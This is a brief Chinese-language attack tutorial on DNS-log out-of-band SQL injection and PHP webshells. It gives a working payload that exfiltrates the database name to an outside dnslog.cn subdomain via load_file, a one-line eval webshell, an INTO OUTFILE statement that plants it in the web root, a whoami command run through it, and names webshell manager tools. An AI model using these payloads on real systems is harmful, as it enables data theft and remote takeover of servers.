- DNS注入
DNS注入主要是利用DNS的日志会存储用户的请求解析信息的特点,通过这一点,可以使得数据外带,将访问者的相关信息暴露出来。
我们可以利用DNSLOG平台来达到我们的目标:
DNS平台:
http://www.dnslog.cn/
-
点击Get SubDomain可以随机获得一个域名
-
尝试ping这个域名
ping x1wjqb.dnslog.cn -
回到DNSlog平台,刷新记录,会发现我们的访问记录在日志中显示出来了。
-
因此,如果我们构造一个payload语句
select load_file(concat('//',(select database()),'.x1wjqb.dnslog.cn/abc'));
回到dnslog发现数据库名hello被外带出来了,接下来就是正常的sql注入流程,带表名,带字段,带数据
其中load_file用于文件读取,需要配置文件中设置secure_file_priv=
- 一句话木马
<?php eval($_REQUEST['aa']);?>
select '<?php eval($_REQUEST['aa']);?>' into outfile '../../../../../../phpstudy/WWW/test.php';
浏览器访问对应的地址
/test.php?aa=`whoami`;
可以利用报错信息执行终端命令
Webshell管理工具:
1.中国菜刀
2.蚁剑
3.冰蝎
4.哥斯拉
以蚁剑为例(连接成功后可以进行文件管理,数据操作等)
